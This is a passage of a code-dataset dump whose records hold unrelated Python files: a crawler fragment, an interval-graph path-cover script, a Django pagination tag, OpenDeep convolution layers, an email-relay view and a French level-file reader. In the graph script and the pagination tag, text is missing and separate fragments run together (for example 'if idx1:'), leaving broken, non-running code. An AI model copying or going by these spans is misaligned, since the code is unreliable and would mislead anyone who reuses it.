BeautifulSoup(starting_page)\n\n # getting titles of the web pages\n name_temp = page.title.string\n\n for x in page.findAll('a', attrs={'href': re.compile(\"^http://\")}):\n link_temp.append(x.get('href'))\n\n # storing in class variable\n links = link_temp\n self.name = name_temp\n # returning all the links\n return links\n","sub_path":"spidy/spidy.py","file_name":"spidy.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"147134027","text":"import re\r\nimport sys\r\nimport math\r\nimport networkx as nx\r\nfrom matplotlib import pyplot as plt\r\nfrom collections import defaultdict\r\ndef input(): return sys.stdin.readline().rstrip('\\r\\n')\r\ntake_input = lambda: list(map(int, input().split()))\r\n\r\nsys.stdin = open('input.txt', 'r') \r\nsys.stdout = open('output.txt', 'w') \r\n\r\nGraph = defaultdict(list)\r\nFinalGraph = defaultdict(list)\r\nFinalGraphNodeData = defaultdict(list)\r\nNodeIntervalG = defaultdict(list)\r\nedges = defaultdict(list)\r\nedgeinbetween = defaultdict(list)\r\nedgeIntervalG = defaultdict(list)\r\ndist=defaultdict(list)\r\nedgeDist=defaultdict(list)\r\n\r\ndef addEdge(graph,u,v):\r\n graph[u].append(v)\r\n graph[v].append(u)\r\n\r\nn,m = take_input()\r\n\r\nfor j in range (1,m+1):\r\n u,v = take_input()\r\n su = \"v\"+str(u);\r\n sv = \"v\"+str(v);\r\n addEdge(Graph,su,sv)\r\n edges[j]=(su,sv)\r\n edgeinbetween[(su,sv)] = j\r\n edgeinbetween[(sv,su)] = j\r\n\r\nfor j in range (1,n+1):\r\n vj = \"v\"+str(j);\r\n l,r = take_input()\r\n NodeIntervalG[vj] = (l,r)\r\n\r\nfor j in range (1,m+1):\r\n u,v = edges[j]\r\n l = max(NodeIntervalG[u][0],NodeIntervalG[v][0])\r\n r = min(NodeIntervalG[u][1],NodeIntervalG[v][1])\r\n edgeIntervalG[j] = (l,r)\r\nG=nx.Graph()\r\nfor k,v in Graph.items():\r\n G.add_node(k)\r\n for i in v:\r\n G.add_edge(k,i)\r\nnx.draw(G,with_labels=1)\r\nplt.title('Given arbitrary Interval graph')\r\nplt.show() \r\nrandom_pos = nx.random_layout(G, seed=42)\r\nnode_positions = nx.spring_layout(G, pos=random_pos) \r\npos=node_positions\r\nfor j in range(1,m+1):\r\n u,v=edges[j]\r\n dist_node=math.sqrt((pos[u][0] - pos[v][0])**2 + (pos[u][1] - pos[v][1])**2)\r\n edgeDist[j]=dist_node\r\nprint('edgeDist' , edgeDist) \r\nkey=node_positions.keys()\r\nkeylist=list(key)\r\nvalue=node_positions.values()\r\nvaluel=list(value) \r\nv=edgeDist.values()\r\nvlist=list(v)\r\nk=edgeDist.keys()\r\nklist=list(k)\r\nke=edgeinbetween.keys()\r\nkelist=list(ke)\r\nve=edgeinbetween.values()\r\nvelist=list(ve)\r\nDEedge=[]\r\ncount=0\r\nfor j in range(len(klist)):\r\n edgejdist=vlist[j]\r\n #print(edgejdist)\r\n index=velist.index(klist[j])\r\n u=kelist[index]\r\n #print(u)\r\n u0=u[0]\r\n u1=u[1]\r\n in1=keylist.index(u0)\r\n in2=keylist.index(u1)\r\n v1=valuel[in1]\r\n v2=valuel[in2]\r\n for i in range(len(valuel)):\r\n t=valuel[i]\r\n ds1=math.sqrt((v1[0]-t[0])*(v1[0]-t[0]))+((v1[1]-t[1])*(v1[1]-t[1]))\r\n if ds1<=edgejdist:\r\n count=count+1 \r\n ds2=math.sqrt((v2[0]-t[0])*(v2[0]-t[0]))+((v2[1]-t[1])*(v2[1]-t[1]))\r\n if ds2<=edgejdist:\r\n count=count+1\r\n dist[j+1]=count \r\n count=0 \r\n#print(dist)\r\nvl=dist.values()\r\nvll=list(vl)\r\nde=defaultdict(list)\r\nfor i in range(len(vll)):\r\n de[i+1]=vll[i]+vlist[i]\r\n DEedge.append(vll[i]+vlist[i])\r\nprint('DE weight ', de) \r\n#print('DEedge ',DEedge) \r\nmaxde=13.338085831290979\r\ndef optimalpathcover(n,Graph):\r\n opc=[] #set of distinct path components covering all vertices of graph.\r\n vertices=[\"v\"+str(i) for i in range(1,n+1)] \r\n uncoverV=[\"v\"+str(i) for i in range(1,n+1)] #list of unvisited vertices \r\n vi=uncoverV[0]\r\n num=1 #num is the number of disjoint path components \r\n pnum=vi #first path is started with the rightmostvertex of an interval graph\r\n uncoverV.remove(uncoverV[0])\r\n def s(vi):\r\n index=vertices.index(vi)\r\n s=[]\r\n for j in range(0,len(Graph[vi])): \r\n if Graph[vi][j] in uncoverV:\r\n idx=vertices.index(Graph[vi][j])\r\n t=Graph[vi][j]\r\n e=edgeinbetween[(vi,t)]\r\n if idx>index and de[e]<=maxde:\r\n s.append(Graph[vi][j])\r\n #print(s) \r\n return s\r\n \r\n def t(vi):\r\n index=vertices.index(vi)\r\n t=[]\r\n for j in range(len(Graph[vi])):\r\n if(Graph[vi][j] in uncoverV):\r\n idx=vertices.index(Graph[vi][j])\r\n t1=Graph[vi][j]\r\n e=edgeinbetween[(vi,t1)]\r\n if idx1:\r\n T=opc[0]\r\n opc.remove(T)\r\n Tlist=get_List(T)\r\n T_lmv=Tlist[0]\r\n tdict=get_Dict(T)\r\n T=nx.path_graph(len(Tlist))\r\n T.add_nodes_from(tdict)\r\n T=nx.relabel_nodes(T,tdict)\r\n \r\n def minimumrightend(nghT):\r\n ngh=''.join(nghT)\r\n number=[int(i) for i in re.findall(r'\\d+', ngh)]\r\n numlist=sorted(number)\r\n nghList=[\"v\"+str(numlist[i]) for i in range(len(number))] \r\n minvalue=nghList[0]\r\n return minvalue\r\n\r\n def to_int(a):\r\n a=a[1:]\r\n return int(a);\r\n \r\n while opc!=[]:\r\n q=opc[0]\r\n nghq=[]\r\n nghT=[]\r\n qlist=get_List(q)\r\n qdict=get_Dict(q)\r\n q=nx.path_graph(len(qlist))\r\n q.add_nodes_from(qdict)\r\n q=nx.relabel_nodes(q,qdict)\r\n q_lmv=qlist[0]\r\n if to_int(q_lmv)power[1] or (mx==power[1] and mn= count:\n endPage = count+1\n startPage = endPage-TOTAL_PAGES+1\n if startPage < 1:\n startPage = 1\n \n \n page_numbers = [n for n in range(startPage, endPage)]\n \n get_dict = context['request'].GET.copy()\n if get_dict.get('page'):\n del get_dict['page']\n \n get = '?'+''.join([ key+'='+value+'&' for key, value in get_dict.items()])\n if len(get) == 1:\n get = get.rstrip('&')\n \n return render_to_string('pagination.html',\n {'page_obj':context['page_obj'],\n 'page_range':page_numbers,\n 'show_first': 1 not in page_numbers,\n 'show_last': count not in page_numbers,\n 'num_pages':count,\n 'get':get})\n\n\n\n\n","sub_path":"pagination/templatetags/pagination.py","file_name":"pagination.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"23544034","text":"\"\"\"\n.. module:: convolutional\n\nThis module provides the layers necessary for convolutional nets.\n\nTO USE CUDNN WRAPPING, YOU MUST INSTALL THE APPROPRIATE .h and .so FILES FOR THEANO LIKE SO:\nhttp://deeplearning.net/software/theano/library/sandbox/cuda/dnn.html\n\"\"\"\n\n__authors__ = \"Markus Beissinger\"\n__copyright__ = \"Copyright 2015, Vitruvian Science\"\n__credits__ = [\"Lasagne\", \"Weiguang Ding\", \"Ruoyan Wang\", \"Fei Mao\", \"Graham Taylor\", \"Markus Beissinger\"]\n__license__ = \"Apache\"\n__maintainer__ = \"OpenDeep\"\n__email__ = \"opendeep-dev@googlegroups.com\"\n\n# standard libraries\nimport logging\n# third party libraries\nimport numpy\nimport theano\nimport theano.tensor as T\nfrom theano.tensor.signal import downsample\nimport theano.compat.six as six\n# internal references\nfrom opendeep.models.model import Model\nfrom opendeep.utils.activation import get_activation_function\nfrom opendeep.utils.nnet import get_weights_gaussian, get_weights_uniform, get_bias, cross_channel_normalization_bc01\nfrom opendeep.utils.conv1d_implementations import conv1d_mc0\n\n\nlog = logging.getLogger(__name__)\n\n# flag for having NVIDIA's CuDNN library.\nhas_cudnn = True\ntry:\n from theano.sandbox.cuda import dnn\nexcept ImportError as e:\n has_cudnn = False\n log.warning(\"Could not import CuDNN from theano. For fast convolutions, \"\n \"please install it like so: http://deeplearning.net/software/theano/library/sandbox/cuda/dnn.html\")\n\n# Some convolution operations only work on the GPU, so do a check here:\nif not theano.config.device.startswith('gpu'):\n log.warning(\"You should reeeeeaaaally consider using a GPU, unless this is a small toy algorithm for fun. \"\n \"Please enable the GPU in Theano via these instructions: \"\n \"http://deeplearning.net/software/theano/tutorial/using_gpu.html\")\n\n# To use the fastest convolutions possible, need to set the Theano flag as described here:\n# http://benanne.github.io/2014/12/09/theano-metaopt.html\n# make it THEANO_FLAGS=optimizer_including=conv_meta\n# OR you could set the .theanorc file with [global]optimizer_including=conv_meta\nif theano.config.optimizer_including != \"conv_meta\":\n log.warning(\"Theano flag optimizer_including is not conv_meta (found %s)! \"\n \"To have Theano cherry-pick the best convolution implementation, please set \"\n \"optimizer_including=conv_meta either in THEANO_FLAGS or in the .theanorc file!\"\n % str(theano.config.optimizer_including))\n\n\nclass Conv1D(Model):\n \"\"\"\n A 1-dimensional convolution (taken from Sander Dieleman's Lasagne framework)\n (https://github.com/benanne/Lasagne/blob/master/lasagne/theano_extensions/conv.py)\n \"\"\"\n defaults = {\n \"border_mode\": \"valid\",\n \"weights_init\": \"uniform\",\n 'weights_interval': 'montreal', # if the weights_init was 'uniform', how to initialize from uniform\n 'weights_mean': 0, # mean for gaussian weights init\n 'weights_std': 0.005, # standard deviation for gaussian weights init\n 'bias_init': 0.0, # how to initialize the bias parameter\n \"activation\": 'rectifier',\n \"convolution\": conv1d_mc0\n }\n def __init__(self, inputs_hook, params_hook=None, input_shape=None, filter_shape=None, stride=None,\n weights_init=None, weights_interval=None, weights_mean=None, weights_std=None, bias_init=None,\n border_mode=None, activation=None, convolution=None, config=None, defaults=defaults):\n # combine everything by passing to Model's init\n super(Conv1D, self).__init__(**{arg: val for (arg, val) in locals().iteritems() if arg is not 'self'})\n # configs can now be accessed through self dictionary\n\n ##################\n # specifications #\n ##################\n # grab info from the inputs_hook, or from parameters\n # expect input to be in the form (B, C, I) (batch, channel, input data)\n # inputs_hook is a tuple of (Shape, Input)\n if self.inputs_hook is not None:\n # make sure inputs_hook is a tuple\n assert len(self.inputs_hook) == 2, \"expecting inputs_hook to be tuple of (shape, input)\"\n self.input_shape = inputs_hook[0] or self.input_shape\n self.input = inputs_hook[1]\n else:\n # make the input a symbolic matrix\n self.input = T.ftensor3('X')\n\n # activation function!\n # if a string name was given, look up the correct function from our utils.\n if isinstance(self.activation, six.string_types):\n activation_func = get_activation_function(self.activation)\n # otherwise, if a 'callable' was passed (i.e. custom function), use that directly.\n else:\n assert callable(self.activation), \"Activation function either needs to be a string name or callable!\"\n activation_func = self.activation\n\n # filter shape should be in the form (num_filters, num_channels, filter_length)\n num_filters = self.filter_shape[0]\n filter_length = self.filter_shape[2]\n\n ################################################\n # Params - make sure to deal with params_hook! #\n ################################################\n if self.params_hook:\n # make sure the params_hook has W and b\n assert len(self.params_hook) == 2, \\\n \"Expected 2 params (W and b) for Conv1D, found {0!s}!\".format(len(self.params_hook))\n W, b = self.params_hook\n else:\n # if we are initializing weights from a gaussian\n if self.weights_init.lower() == 'gaussian':\n W = get_weights_gaussian(\n shape=self.filter_shape, mean=self.weights_mean, std=self.weights_std, name=\"W\"\n )\n # if we are initializing weights from a uniform distribution\n elif self.weights_init.lower() == 'uniform':\n W = get_weights_uniform(shape=self.filter_shape, interval=self.weights_interval, name=\"W\")\n # otherwise not implemented\n else:\n log.error(\"Did not recognize weights_init %s! Pleas try gaussian or uniform\" %\n str(self.weights_init))\n raise NotImplementedError(\n \"Did not recognize weights_init %s! Pleas try gaussian or uniform\" %\n str(self.weights_init))\n\n b = get_bias(shape=(num_filters,), name=\"b\", init_values=self.bias_init)\n\n # Finally have the two parameters!\n self.params = [W, b]\n\n ########################\n # Computational Graph! #\n ########################\n if self.border_mode in ['valid', 'full']:\n conved = convolution(self.input,\n W,\n subsample=(self.stride,),\n image_shape=self.input_shape,\n filter_shape=self.filter_shape,\n border_mode=self.border_mode)\n elif self.border_mode == 'same':\n conved = convolution(self.input,\n W,\n subsample=(self.stride,),\n image_shape=self.input_shape,\n filter_shape=self.filter_shape,\n border_mode='full')\n shift = (filter_length - 1) // 2\n conved = conved[:, :, shift:self.input_shape[2] + shift]\n\n else:\n log.error(\"Invalid border mode: '%s'\" % self.border_mode)\n raise RuntimeError(\"Invalid border mode: '%s'\" % self.border_mode)\n\n self.output = activation_func(conved + b.dimshuffle('x', 0, 'x'))\n\n def get_inputs(self):\n return [self.input]\n\n def get_outputs(self):\n return self.output\n\n def get_params(self):\n return self.params\n\n def save_args(self, args_file=\"conv1d_config.pkl\"):\n super(Conv1D, self).save_args(args_file)\n\n\nclass Conv2D(Model):\n \"\"\"\n A 2-dimensional convolution (taken from Sander Dieleman's Lasagne framework)\n (https://github.com/benanne/Lasagne/blob/master/lasagne/theano_extensions/conv.py)\n \"\"\"\n defaults = {\n \"border_mode\": \"valid\",\n \"weights_init\": \"uniform\",\n 'weights_interval': 'montreal', # if the weights_init was 'uniform', how to initialize from uniform\n 'weights_mean': 0, # mean for gaussian weights init\n 'weights_std': 0.005, # standard deviation for gaussian weights init\n 'bias_init': 0.0, # how to initialize the bias parameter\n \"activation\": 'rectifier',\n # using the theano flag optimizer_including=conv_meta will let this conv function optimize itself.\n \"convolution\": T.nnet.conv2d\n }\n def __init__(self, inputs_hook, params_hook=None, input_shape=None, filter_shape=None, strides=None,\n weights_init=None, weights_interval=None, weights_mean=None, weights_std=None, bias_init=None,\n border_mode=None, activation=None, convolution=None, config=None, defaults=defaults):\n # combine everything by passing to Model's init\n super(Conv2D, self).__init__(**{arg: val for (arg, val) in locals().iteritems() if arg is not 'self'})\n # configs can now be accessed through self!\n\n ##################\n # specifications #\n ##################\n # grab info from the inputs_hook, or from parameters\n # expect input to be in the form (B, C, 0, 1) (batch, channel, rows, cols)\n # inputs_hook is a tuple of (Shape, Input)\n if self.inputs_hook:\n # make sure inputs_hook is a tuple\n assert len(self.inputs_hook) == 2, \"expecting inputs_hook to be tuple of (shape, input)\"\n self.input_shape = inputs_hook[0] or self.input_shape\n self.input = inputs_hook[1]\n else:\n # make the input a symbolic matrix\n self.input = T.ftensor4('X')\n\n # activation function!\n # if a string name was given, look up the correct function from our utils.\n if isinstance(self.activation, six.string_types):\n activation_func = get_activation_function(self.activation)\n # otherwise, if a 'callable' was passed (i.e. custom function), use that directly.\n else:\n assert callable(self.activation), \"Activation function either needs to be a string name or callable!\"\n activation_func = self.activation\n\n # filter shape should be in the form (num_filters, num_channels, filter_size[0], filter_size[1])\n num_filters = self.filter_shape[0]\n filter_size = self.filter_shape[2:3]\n\n ################################################\n # Params - make sure to deal with params_hook! #\n ################################################\n if self.params_hook:\n # make sure the params_hook has W and b\n assert len(self.params_hook) == 2, \\\n \"Expected 2 params (W and b) for Conv2D, found {0!s}!\".format(len(self.params_hook))\n W, b = self.params_hook\n else:\n # if we are initializing weights from a gaussian\n if self.weights_init.lower() == 'gaussian':\n W = get_weights_gaussian(\n shape=self.filter_shape, mean=self.weights_mean, std=self.weights_std, name=\"W\"\n )\n # if we are initializing weights from a uniform distribution\n elif self.weights_init.lower() == 'uniform':\n W = get_weights_uniform(shape=self.filter_shape, interval=self.weights_interval, name=\"W\")\n # otherwise not implemented\n else:\n log.error(\"Did not recognize weights_init %s! Pleas try gaussian or uniform\" %\n str(self.weights_init))\n raise NotImplementedError(\n \"Did not recognize weights_init %s! Pleas try gaussian or uniform\" %\n str(self.weights_init))\n\n b = get_bias(shape=(num_filters, ), name=\"b\", init_values=self.bias_init)\n\n # Finally have the two parameters!\n self.params = [W, b]\n\n ########################\n # Computational Graph! #\n ########################\n if self.border_mode in ['valid', 'full']:\n conved = convolution(self.input,\n W,\n subsample=self.strides,\n image_shape=self.input_shape,\n filter_shape=self.filter_shape,\n border_mode=self.border_mode)\n elif self.border_mode == 'same':\n conved = convolution(self.input,\n W,\n subsample=self.strides,\n image_shape=self.input_shape,\n filter_shape=self.filter_shape,\n border_mode='full')\n shift_x = (filter_size[0] - 1) // 2\n shift_y = (filter_size[1] - 1) // 2\n conved = conved[:, :, shift_x:self.input_shape[2] + shift_x,\n shift_y:self.input_shape[3] + shift_y]\n else:\n raise RuntimeError(\"Invalid border mode: '%s'\" % self.border_mode)\n\n self.output = activation_func(conved + b.dimshuffle('x', 0, 'x', 'x'))\n\n def get_inputs(self):\n return [self.input]\n\n def get_outputs(self):\n return self.output\n\n def get_params(self):\n return self.params\n\n def save_args(self, args_file=\"conv2d_config.pkl\"):\n super(Conv2D, self).save_args(args_file)\n\n\nclass Conv3D(Model):\n \"\"\"\n A 3-dimensional convolution layer\n \"\"\"\n defaults = {\n \"border_mode\": \"valid\",\n \"weights_init\": \"uniform\",\n 'weights_interval': 'montreal', # if the weights_init was 'uniform', how to initialize from uniform\n 'weights_mean': 0, # mean for gaussian weights init\n 'weights_std': 0.005, # standard deviation for gaussian weights init\n 'bias_init': 0.0, # how to initialize the bias parameter\n \"activation\": 'rectifier',\n # using the theano flag optimizer_including=conv_meta will let this conv function optimize itself.\n \"convolution\": T.nnet.conv3D\n }\n\n def __init__(self):\n log.error(\"Conv3D not implemented yet.\")\n super(Conv3D, self).__init__()\n raise NotImplementedError(\"Conv3D not implemented yet.\")\n\n\nclass ConvPoolLayer(Model):\n \"\"\"\n This is the ConvPoolLayer used for an AlexNet implementation.\n\n Copyright (c) 2014, Weiguang Ding, Ruoyan Wang, Fei Mao and Graham Taylor\n All rights reserved.\n Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:\n 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.\n 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.\n 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.\n THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n \"\"\"\n defaults = {\n 'filter_shape': (96, 3, 11, 11), # bc01\n 'convstride': 4,\n 'padsize': 0,\n 'group': 1,\n 'poolsize': 3,\n 'poolstride': 2,\n 'bias_init': 0,\n 'local_response_normalization': False,\n 'convolution': T.nnet.conv2d,\n 'activation': 'rectifier',\n \"weights_init\": \"gaussian\",\n 'weights_interval': 'montreal', # if the weights_init was 'uniform', how to initialize from uniform\n 'weights_mean': 0, # mean for gaussian weights init\n 'weights_std': 0.01, # standard deviation for gaussian weights init\n }\n def __init__(self, inputs_hook, input_shape=None, filter_shape=None, convstride=None, padsize=None, group=None,\n poolsize=None, poolstride=None, bias_init=None, local_response_normalization=None,\n convolution=None, activation=None, params_hook=None, config=None, defaults=defaults):\n # combine everything by passing to Model's init\n super(ConvPoolLayer, self).__init__(**{arg: val for (arg, val) in locals().iteritems() if arg is not 'self'})\n # configs can now be accessed through self!\n\n # deal with the inputs coming from inputs_hook - necessary for now to give an input hook\n # inputs_hook is a tuple of (Shape, Input)\n if self.inputs_hook:\n assert len(self.inputs_hook) == 2, \"expecting inputs_hook to be tuple of (shape, input)\"\n self.input_shape = self.inputs_hook[0] or self.input_shape\n self.input = inputs_hook[1]\n else:\n self.input = T.ftensor4(\"X\")\n\n #######################\n # layer configuration #\n #######################\n # activation function!\n # if a string name was given, look up the correct function from our utils.\n if isinstance(self.activation, six.string_types):\n self.activation_func = get_activation_function(self.activation)\n # otherwise, if a 'callable' was passed (i.e. custom function), use that directly.\n else:\n assert callable(self.activation), \"Activation function either needs to be a string name or callable!\"\n self.activation_func = self.activation\n\n # expect image_shape to be bc01!\n self.channel = self.input_shape[1]\n\n # shortening a word\n self.lrn = self.local_response_normalization\n\n # if lib_conv is cudnn, it works only on square images and the grad works only when channel % 16 == 0\n\n assert self.group in [1, 2], \"group argument needs to be 1 or 2 (1 for default conv2d)\"\n\n self.filter_shape = numpy.asarray(self.filter_shape)\n self.input_shape = numpy.asarray(self.input_shape)\n\n if self.lrn:\n self.lrn_func = cross_channel_normalization_bc01\n\n ################################################\n # Params - make sure to deal with params_hook! #\n ################################################\n if self.group == 1:\n if self.params_hook:\n # make sure the params_hook has W and b\n assert len(self.params_hook) == 2, \\\n \"Expected 2 params (W and b) for ConvPoolLayer, found {0!s}!\".format(len(self.params_hook))\n self.W, self.b = self.params_hook\n else:\n # if we are initializing weights from a gaussian\n if self.weights_init.lower() == 'gaussian':\n self.W = get_weights_gaussian(\n shape=self.filter_shape, mean=self.weights_mean, std=self.weights_std, name=\"W\"\n )\n # if we are initializing weights from a uniform distribution\n elif self.weights_init.lower() == 'uniform':\n self.W = get_weights_uniform(shape=self.filter_shape, interval=self.weights_interval, name=\"W\")\n # otherwise not implemented\n else:\n log.error(\"Did not recognize weights_init %s! Pleas try gaussian or uniform\" %\n str(self.weights_init))\n raise NotImplementedError(\n \"Did not recognize weights_init %s! Pleas try gaussian or uniform\" %\n str(self.weights_init))\n\n self.b = get_bias(shape=self.filter_shape[0], init_values=self.bias_init, name=\"b\")\n self.params = [self.W, self.b]\n\n else:\n self.filter_shape[0] = self.filter_shape[0] / 2\n self.filter_shape[1] = self.filter_shape[1] / 2\n\n self.input_shape[0] = self.input_shape[0] / 2\n self.input_shape[1] = self.input_shape[1] / 2\n if self.params_hook:\n assert len(self.params_hook) == 4, \"expected params_hook to have 4 params\"\n self.W0, self.W1, self.b0, self.b1 = self.params_hook\n else:\n self.W0 = get_weights_gaussian(shape=self.filter_shape, name=\"W0\")\n self.W1 = get_weights_gaussian(shape=self.filter_shape, name=\"W1\")\n self.b0 = get_bias(shape=self.filter_shape[0], init_values=self.bias_init, name=\"b0\")\n self.b1 = get_bias(shape=self.filter_shape[0], init_values=self.bias_init, name=\"b1\")\n self.params = [self.W0, self.b0, self.W1, self.b1]\n\n #############################################\n # build appropriate graph for conv. version #\n #############################################\n self.output = self.build_computation_graph()\n\n # Local Response Normalization (for AlexNet)\n if self.lrn:\n self.output = self.lrn_func(self.output)\n\n log.debug(\"convpool layer initialized with shape_in: %s\", str(self.input_shape))\n\n def build_computation_graph(self):\n if self.group == 1:\n conv_out = self.convolution(img=self.input,\n kerns=self.W,\n subsample=(self.convstride, self.convstride),\n border_mode=(self.padsize, self.padsize))\n conv_out = conv_out + self.b.dimshuffle('x', 0, 'x', 'x')\n\n else:\n conv_out0 = self.convolution(img=self.input[:, :self.channel / 2, :, :],\n kerns=self.W0,\n subsample=(self.convstride, self.convstride),\n border_mode=(self.padsize, self.padsize))\n conv_out0 = conv_out0 + self.b0.dimshuffle('x', 0, 'x', 'x')\n\n\n conv_out1 = self.convolution(img=self.input[:, self.channel / 2:, :, :],\n kerns=self.W1,\n subsample=(self.convstride, self.convstride),\n border_mode=(self.padsize, self.padsize))\n conv_out1 = conv_out1 + self.b1.dimshuffle('x', 0, 'x', 'x')\n\n conv_out = T.concatenate([conv_out0, conv_out1], axis=1)\n\n # ReLu by default\n output = self.activation_func(conv_out)\n\n # Pooling\n if self.poolsize != 1:\n if has_cudnn:\n output = dnn.dnn_pool(output,\n ws=(self.poolsize, self.poolsize),\n stride=(self.poolstride, self.poolstride))\n else:\n output = downsample.max_pool_2d(output,\n ds=(self.poolsize, self.poolsize),\n st=(self.poolstride, self.poolstride))\n\n return output\n\n def get_inputs(self):\n return [self.input]\n\n def get_outputs(self):\n return self.output\n\n def get_params(self):\n return self.params\n\n def save_args(self, args_file=\"convpool_config.pkl\"):\n super(ConvPoolLayer, self).save_args(args_file)\n","sub_path":"opendeep/models/single_layer/convolutional.py","file_name":"convolutional.py","file_ext":"py","file_size_in_byte":24197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"441562648","text":"from email.utils import parseaddr\nimport json\n\nfrom decouple import config\nfrom socketlabs.injectionapi import SocketLabsClient\nfrom socketlabs.injectionapi.message.basicmessage import BasicMessage\nfrom socketlabs.injectionapi.message.emailaddress import EmailAddress\n\nfrom django.conf import settings\nfrom django.core.exceptions import PermissionDenied\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect, render, get_object_or_404\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom .models import RelayAddress\n\n\n@csrf_exempt\ndef index(request):\n if not request.user:\n raise PermissionDenied\n if request.method == 'POST':\n return _index_POST(request)\n return redirect('profile')\n\n\ndef _index_POST(request):\n api_token = request.POST.get('api_token', None)\n if not api_token:\n raise PermissionDenied\n user_profile = request.user.profile_set.first()\n if not str(api_token) == str(user_profile.api_token):\n raise PermissionDenied\n if request.POST.get('method_override', None) == 'DELETE':\n return _index_DELETE(request)\n\n RelayAddress.objects.create(user=request.user)\n return redirect('profile')\n\n\n#TODO: add csrf here? or make ids uuid so they can't be guessed?\ndef _index_DELETE(request):\n try:\n relay_address = RelayAddress.objects.get(\n id=request.POST['relay_address_id']\n )\n relay_address.delete()\n return redirect('profile')\n except RelayAddress.DoesNotExist as e:\n print(e)\n return HttpResponse(\"Address does not exist\")\n\n\n@csrf_exempt\ndef inbound(request):\n if _get_secret_key(request) != settings.SOCKETLABS_SECRET_KEY:\n return HttpResponse(\"Unauthorized\", status=401)\n\n if (request.content_type == 'application/x-www-form-urlencoded' and\n request.POST['Type'] == 'Validation'):\n return HttpResponse(settings.SOCKETLABS_VALIDATION_KEY)\n\n if request.content_type != 'application/json':\n return HttpResponse(\"Unsupported Media Type\", status=415)\n\n json_body = json.loads(request.body)\n db_message = _inbound_logic(json_body)\n\n return HttpResponse(\"Created\", status=201)\n\n\ndef _get_secret_key(request):\n if request.content_type == 'application/x-www-form-urlencoded':\n return request.POST['SecretKey']\n if request.content_type == 'application/json':\n json_body = json.loads(request.body)\n return json_body['SecretKey']\n return ''\n\n\ndef _inbound_logic(json_body):\n message_data = json_body['Message']\n email_to = parseaddr(message_data['To'][0]['EmailAddress'])[1]\n local_portion = email_to.split('@')[0]\n from_address = parseaddr(message_data['From']['EmailAddress'])[1]\n subject = message_data.get('Subject')\n text = message_data.get('TextBody')\n html = message_data.get('HtmlBody')\n\n # TODO: do we need this in SocketLabs?\n # 404s make sendgrid retry the email, so respond with 200 even if\n # the address isn't found\n try:\n relay_address = RelayAddress.objects.get(address=local_portion)\n except RelayAddress.DoesNotExist as e:\n print(e)\n return HttpResponse(\"Address does not exist\")\n\n # Forward to real email address\n sl_message = BasicMessage()\n sl_message.subject = subject\n sl_message.html_body = html\n sl_message.plain_text_body = text\n relay_from_address, relay_from_display = _generate_relay_From(from_address)\n sl_message.from_email_address = EmailAddress(\n relay_from_address, relay_from_display\n )\n sl_message.to_email_address.append(EmailAddress(relay_address.user.email))\n socketlabs_client = SocketLabsClient(\n settings.SOCKETLABS_SERVER_ID, settings.SOCKETLABS_API_KEY\n )\n response = socketlabs_client.send(sl_message)\n print(response)\n\n\ndef _generate_relay_From(original_from_address):\n relay_display_name, relay_from_address = parseaddr(\n settings.RELAY_FROM_ADDRESS\n )\n return relay_from_address, '%s via Firefox Private Relay' % (\n original_from_address\n )\n","sub_path":"emails/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"81763608","text":"# -*- coding: iso-8859-15 -*-\r\n\r\n#Fonction permettant d'incrementer facilement fin\r\ndef parcourir(tab, nb, String):\r\n\twhile nb < len(tab) and tab[nb] != String:\r\n\t\tnb += 1\r\n\treturn nb\r\n\r\nfrom Level import Level\r\n#lecture d'un niveau a partir de la position relative de celui-ci. Le repertoire exacte doit etre indique\r\ndef lecture(pos):\r\n\r\n\tlecture = open(pos, \"r\")\r\n\t\r\n\t#on transforme le fichier en grand String\r\n\tcontenu = lecture.read()\r\n\t\r\n\t#separateurs\r\n\tbarre = '|'\r\n\tvirgule = ';'\r\n\t\r\n\t\r\n\tfin = 0\t#debut a 0\r\n\tfin = parcourir(contenu, fin, barre)#premiere barre (apres nom)\r\n\tnom = contenu[4 : fin]#Le nom va du caractere 4 (apres le \"NOM:\") jusqu'a la premiere barre\r\n\r\n\tfin = fin + 6#on saute le nom\r\n\tdebut = fin\r\n\tfin = parcourir(contenu, fin, virgule)#on va au prochain point-virgule\r\n\t\r\n\trang1 = str(contenu[debut : fin])#determination des rangs (partie fixe du fichier niveau)\r\n\trang1 = int(rang1)\r\n\t\r\n\tfin += 1\r\n\tdebut = fin\r\n\t\r\n\tfin = parcourir(contenu, fin, virgule)\r\n\trang2 = str(contenu[debut : fin])\r\n\trang2 = int(rang2)\r\n\t\r\n\tfin += 1\r\n\tdebut = fin\r\n\t\r\n\tfin = parcourir(contenu, fin, 